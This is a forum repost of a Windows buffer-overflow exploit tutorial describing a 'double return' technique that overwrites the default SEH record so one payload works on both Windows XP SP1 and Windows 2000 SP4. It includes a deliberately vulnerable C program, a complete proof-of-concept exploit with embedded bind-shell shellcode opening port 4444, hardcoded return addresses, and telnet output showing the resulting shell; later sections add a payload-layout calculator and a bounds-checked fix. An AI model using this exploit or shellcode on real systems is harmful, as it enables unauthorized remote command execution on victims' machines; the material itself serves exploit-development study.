数学建模社区-数学中国

Title: Exploiting Default Exception Handler to Increase Exploit Sta

Author: 韩冰    Posted: 2004-11-19 10:39
The goal of this method is to create a stable exploit that successfully exploits a buffer overflow vulnerability on more than one Windows version. Every Windows thread has a default (last-chance) structured exception handler whose EXCEPTION_REGISTRATION record sits at the high end of its stack, above main()'s frame. When exploiting a normal stack overflow we stop at the return address; here we keep writing past it and overwrite that default exception handler record as well.

[Buf]                      <- Shellcode (behind a short NOP sled)
[Return Address]           <- jmp register (esp, for Windows XP SP1)
[Stage1 Shellcode for XP]  <- ESP points here after the ret
[Various Stack Data]       <- Junk
[Pointer To Next SEH]      <- "\xEB\x06\xff\xff": jmp short 6 bytes forward, over the handler slot
[SE Handler]               <- jmp register (ebx, for Win2k SP4)
[Stage1 Shellcode]         <- stage1 shellcode for Win2k

If the first return address (chosen for Windows XP SP1) is wrong because the program is actually running on Windows 2000 SP4, executing at that address raises an exception. The exception dispatcher walks the SEH chain and reaches the default record we overwrote, so it calls our second address (chosen for Windows 2000 SP4). One payload therefore carries two return addresses, and the wrong one fails over to the right one. This depends on the bad address raising an exception rather than silently running something else, and on the overwritten record being the one the dispatcher reaches; both held for the two builds used here.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:
//lamebuf.c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[]) {
    char buf[512];    // overflowed by the strcpy() below
    char buf1[1024];  // simulates a deeper stack: the overflow runs through it before reaching saved EBP
    //DebugBreak();
    if (argc != 2) { return -1; }

    strcpy(buf, argv[1]);  // no length check: a long argv[1] overwrites buf1, saved EBP, the return address and the SEH record above main()
    return 0x0;
}

Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following registers:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:
0x0012FFB0 41414141 Pointer to next SEH record
0x0012FFB4 41414141 SE handler

We successfully overwrote the return address (EIP is 41414141) and the default exception handler record, which sits 0x28 bytes above ESP.

Primary Return Address (Windows XP SP1 EN):
The first return address is used exactly as in a normal stack overflow. The crash dump shows that ESP points into our input right after the return address, so that is where the first-stage shellcode goes. The return address is 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and the first-stage shellcode is:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
which decodes to mov ecx,esp / dec ch (six times) / mov esp,ecx / jmp esp: it moves ESP 0x600 bytes down the stack, into the NOP sled in front of the main shellcode, and jumps there. Lowering ESP first also keeps the shellcode's own pushes below the payload instead of on top of it.

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address is used as in a normal SEH overwrite. On this build the dispatcher calls our handler with EBX pointing at the overwritten "pointer to next SEH" field, so the handler address is 0x77F92A9B (jmp ebx on Win2k SP4 EN). That executes the "\xEB\x06" short jump stored in the field, which skips over the handler address itself and lands in the Win2k first-stage shellcode:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
which decodes to mov ecx,eax / dec ch (three times) / mov esp,ecx / jmp ecx: it takes the value EAX holds when the handler runs, subtracts 0x300, and jumps there. Both stubs depend on register contents at the moment they execute, which is why each return address and stub is tied to one OS and service pack.

Proof Of Concept:
// exploit.c
// Tal Zeltzer - [Double Return] //

#include <stdio.h>
#include <string.h>
#include <process.h>   // execve()
#include <windows.h>

#define RET_XP    0x77F8AC16 // WinXP SP1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k SP4 English - jmp ebx

// Stage1 for WinXP SP1 English: mov ecx,esp / dec ch x6 / mov esp,ecx / jmp esp
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 for Win2k SP4 English: mov ecx,eax / dec ch x3 / mov esp,ecx / jmp ecx
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc, char *argv[]) {
    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf, 0x0, sizeof(buf));
    memset(buf, 0x90, 1652);                           // NOP sled; buf[1652] stays 0 and terminates argv[1]
    memcpy(&buf[24], shellcode, sizeof(shellcode)-1);

    memcpy(&buf[1544], stage1_1, sizeof(stage1_1)-1); // WinXP SP1 En - stage1, at ESP after the ret
    memcpy(&buf[1592], stage1_2, sizeof(stage1_2)-1); // Win2k SP4 En - stage1, reached by the jmp short below

    *(unsigned long *)&buf[1540] = RET_XP;      // First RET (jmp esp) WinXP SP1 En
    *(unsigned long *)&buf[1584] = 0xcccc06EB;  // Pointer to next SEH: "\xEB\x06" jumps 6 bytes forward to stage1_2; the two 0xCC pad bytes are never executed
    *(unsigned long *)&buf[1588] = RET_WIN2K;   // Second RET (jmp ebx) Win2k SP4 En, written over the SE handler

    bufExe[1] = buf;
    // Execute the vulnerable application with the payload as argv[1]
    execve(bufExe[0], bufExe, NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
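The layout arithmetic behind the double-return payload, as an added example that is not part of the original post or Tal Zeltzer's code: it builds the same 1652-byte buffer from lamebuf.c's frame sizes, decodes the jmp short planted in the next-SEH slot, and simulates the dec ch stubs to show where each stage lands. The two return addresses are the ones quoted in the post and are valid only for those exact builds; the 399-byte bind shell is replaced by a constructed int3 filler of the same length, and the bad-byte set for argv delivery (NUL, 0x0a, tab, space, double quote) is this example's assumption about the Windows CRT's argument parser. The code is pure computation and runs on any platform.

```c
/* double_return_layout.c: added example, not from the post. Builds the payload
 * described above from lamebuf.c's frame sizes and checks the stubs' arithmetic. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RET_XP      0x77F8AC16u  /* WinXP SP1 EN, jmp esp (address quoted in the post) */
#define RET_WIN2K   0x77F92A9Bu  /* Win2k SP4 EN, jmp ebx (address quoted in the post) */

/* Offsets derived from lamebuf.c: buf[512], buf1[1024], saved EBP, return address */
#define OFF_RET     (512 + 1024 + 4)   /* 1540 */
#define OFF_STAGE1  (OFF_RET + 4)      /* 1544: ESP after the 'ret' points here */
#define OFF_NSEH    (OFF_STAGE1 + 40)  /* 1584: 0x0012FFB0 - 0x0012FF88 in the crash dump */
#define OFF_SEH     (OFF_NSEH + 4)     /* 1588 */
#define OFF_STAGE2  (OFF_NSEH + 8)     /* 1592: where 'jmp short +6' lands */
#define OFF_SHELL   24                 /* main payload after a 24-byte NOP sled */
#define PAYLOAD_LEN 1652
#define SHELL_LEN   399                /* size of the win32_bind blob in the post */

static const uint8_t stage1_xp[] =
    "\x89\xE1"                                          /* mov ecx, esp */
    "\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD"  /* dec ch x6: ecx -= 0x600 */
    "\x89\xCC"                                          /* mov esp, ecx */
    "\xFF\xE4";                                         /* jmp esp */
static const uint8_t stage1_2k[] =
    "\x89\xC1"                  /* mov ecx, eax */
    "\xFE\xCD\xFE\xCD\xFE\xCD"  /* dec ch x3: ecx -= 0x300 */
    "\x89\xCC"                  /* mov esp, ecx */
    "\xFF\xE1";                 /* jmp ecx */

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

/* Lay the buffer out exactly as exploit.c does. Returns PAYLOAD_LEN, or -1 if
 * the caller's buffer cannot hold the payload plus the NUL that ends argv[1]. */
int build_payload(uint8_t *out, size_t cap) {
    if (cap < PAYLOAD_LEN + 1) return -1;
    memset(out, 0x90, PAYLOAD_LEN);
    out[PAYLOAD_LEN] = 0;
    memset(out + OFF_SHELL, 0xCC, SHELL_LEN);        /* constructed int3 stand-in for the bind shell */
    put_le32(out + OFF_RET, RET_XP);                  /* primary: jmp esp on XP SP1 */
    memcpy(out + OFF_STAGE1, stage1_xp, sizeof stage1_xp - 1);
    out[OFF_NSEH] = 0xEB; out[OFF_NSEH + 1] = 0x06;   /* jmp short over the handler slot */
    out[OFF_NSEH + 2] = 0xCC; out[OFF_NSEH + 3] = 0xCC; /* pad bytes, never executed */
    put_le32(out + OFF_SEH, RET_WIN2K);               /* secondary: jmp ebx on Win2k SP4 */
    memcpy(out + OFF_STAGE2, stage1_2k, sizeof stage1_2k - 1);
    return PAYLOAD_LEN;
}

/* 'dec ch' only touches bits 8..15 of ecx; it never borrows into the upper half. */
static uint32_t dec_ch(uint32_t r) {
    uint32_t ch = ((r >> 8) - 1) & 0xffu;
    return (r & 0xffff00ffu) | (ch << 8);
}

/* Address the XP stub jumps to, given ESP at the moment it runs. */
uint32_t stage1_xp_target(uint32_t esp) {
    uint32_t ecx = esp;
    for (int i = 0; i < 6; i++) ecx = dec_ch(ecx);
    return ecx;
}

/* Address the Win2k stub jumps to, given EAX when the SE handler runs. */
uint32_t stage1_2k_target(uint32_t eax) {
    uint32_t ecx = eax;
    for (int i = 0; i < 3; i++) ecx = dec_ch(ecx);
    return ecx;
}

/* Decode 'jmp short rel8' at offset 'at'; returns the target offset, or -1 if not a jmp short. */
long short_jmp_target(const uint8_t *p, size_t at) {
    if (p[at] != 0xEB) return -1;
    return (long)at + 2 + (int8_t)p[at + 1];
}

/* Bytes the argv delivery path cannot carry (assumption about the CRT parser):
 * NUL ends the string; space, tab and '"' are argument separators/quoting;
 * 0x0a is excluded because the post's encoder was told to avoid it.
 * Returns the offset of the first offending byte, or -1 if the payload is clean. */
long first_bad_byte(const uint8_t *p, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0x00 || p[i] == 0x0a || p[i] == 0x09 || p[i] == 0x20 || p[i] == 0x22)
            return (long)i;
    return -1;
}

int main(void) {
    uint8_t payload[2048];
    int n = build_payload(payload, sizeof payload);
    uint32_t esp = 0x0012FF88u;               /* ESP at the crash, from the post */
    uint32_t base = esp - OFF_STAGE1;         /* address of payload[0] on the target */
    uint32_t land = stage1_xp_target(esp);
    printf("payload: %d bytes, first bad byte at %ld\n", n, first_bad_byte(payload, (size_t)n));
    printf("XP stub lands at 0x%08X = payload[%u] (NOP sled up to %d, shellcode at %d)\n",
           land, (unsigned)(land - base), OFF_SHELL - 1, OFF_SHELL);
    printf("next-SEH jmp short lands at payload[%ld] (stage1_2k at %d)\n",
           short_jmp_target(payload, OFF_NSEH), OFF_STAGE2);
    return 0;
}
```

The XP stub's six dec ch instructions move exactly 0x600 = 1536 bytes, which is the distance from the stage-1 slot (1544) back into the NOP sled at offset 8, sixteen bytes before the shellcode; the six-byte short jump in the next-SEH slot lands precisely on offset 1592 where the Win2k stage sits. Reworking either offset means redoing this arithmetic, which is why keeping it in code rather than in your head pays off.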


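For contrast, an added example (not from the post) of lamebuf.c with the unbounded strcpy replaced by a length-checked copy; copy_arg is a hypothetical helper name. An argument of 512 bytes or more is refused instead of being written past buf, so neither the return address nor the SEH record above main() can be reached.

```c
/* lamebuf_fixed.c: the post's lamebuf.c with a bounded copy (added example). */
#include <stdio.h>
#include <string.h>

/* Copy src into dst[cap] only if it fits together with its NUL.
 * Returns 0 on success, -1 if src is cap bytes or longer (refused, not truncated). */
int copy_arg(char *dst, size_t cap, const char *src) {
    const char *end = memchr(src, '\0', cap);   /* examines at most cap bytes of src */
    if (end == NULL) return -1;                 /* no terminator within cap: too long */
    memcpy(dst, src, (size_t)(end - src) + 1);  /* length + NUL, always <= cap */
    return 0;
}

int main(int argc, char *argv[]) {
    char buf[512];
    if (argc != 2) { return -1; }
    if (copy_arg(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long: at most %u bytes\n", (unsigned)(sizeof buf - 1));
        return 1;
    }
    printf("copied %u bytes\n", (unsigned)strlen(buf));
    return 0;
}
```

Refusing oversize input rather than silently truncating it is deliberate: truncation hides the condition from the caller, and a quietly shortened string is its own class of bug.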


Welcome to 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5